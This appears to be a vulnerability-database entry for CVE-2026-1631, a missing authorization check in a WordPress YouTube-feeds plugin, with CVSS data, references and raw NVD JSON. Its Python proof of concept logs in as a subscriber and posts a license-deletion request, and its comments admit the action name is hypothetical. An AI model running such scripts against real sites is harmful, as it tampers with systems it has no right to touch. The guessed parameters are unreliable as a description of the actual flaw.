CVE-2026-1631

Description

The Feeds for YouTube (YouTube video, channel, and gallery plugin) WordPress plugin before 2.6.4 is vulnerable to unauthorized modification of the Feeds for YouTube (YouTube video, channel, and gallery plugin) WordPress plugin before 2.6.4's license key due to a missing capability check on the 'actions' function. This makes it possible for subscribers and above delete the license key.

CVSS Details

CVSS Score

5.4

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L

Configurations (Affected Products)

No configuration data available.

Feeds for YouTube < 2.6.4

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

#!/usr/bin/env python3
import requests

# Exploit Title: Feeds for YouTube < 2.6.4 - Subscriber+ License Key Deletion
# CVE: CVE-2026-1631

# Configuration
target_url = "http://example.com/wp-admin/admin-ajax.php"
username = "attacker"  # Low-privileged user (Subscriber)
password = "password"

# Initialize session
session = requests.Session()

# Step 1: Authenticate as a subscriber
login_url = target_url.replace('admin-ajax.php', 'wp-login.php')
login_data = {
    'log': username,
    'pwd': password,
    'redirect_to': 'http://example.com/wp-admin/',
    'wp-submit': 'Log In',
    'testcookie': '1'
}
session.post(login_url, data=login_data)

# Step 2: Exploit the vulnerability in 'actions' function
# The specific action name depends on the plugin's actual AJAX hook registration.
# This PoC simulates the request structure that triggers the vulnerability.
exploit_data = {
    'action': 'sby_actions',  # Hypothetical action name triggering the vulnerable function
    'license_action': 'delete' # Parameter intended to delete the license key
}

response = session.post(target_url, data=exploit_data)

if response.status_code == 200:
    print("[+] Request sent successfully. License key may have been deleted.")
    print("[+] Response:", response.text)
else:
    print("[-] Exploit failed.")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-1631
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-1631
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-1631/
[4] VulDB https://vuldb.com/cve/CVE-2026-1631
[5] https://wpscan.com/vulnerability/b19596c2-69bc-4e15-8632-eb80f4577e3c/

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-1631", "sourceIdentifier": "[email protected]", "published": "2026-05-18T07:16:12.020", "lastModified": "2026-05-18T17:05:46.240", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Feeds for YouTube (YouTube video, channel, and gallery plugin) WordPress plugin before 2.6.4 is vulnerable to unauthorized modification of the Feeds for YouTube (YouTube video, channel, and gallery plugin) WordPress plugin before 2.6.4's license key due to a missing capability check on the 'actions' function. This makes it possible for subscribers and above delete the license key."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 2.5}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://wpscan.com/vulnerability/b19596c2-69bc-4e15-8632-eb80f4577e3c/", "source": "[email protected]"}]}}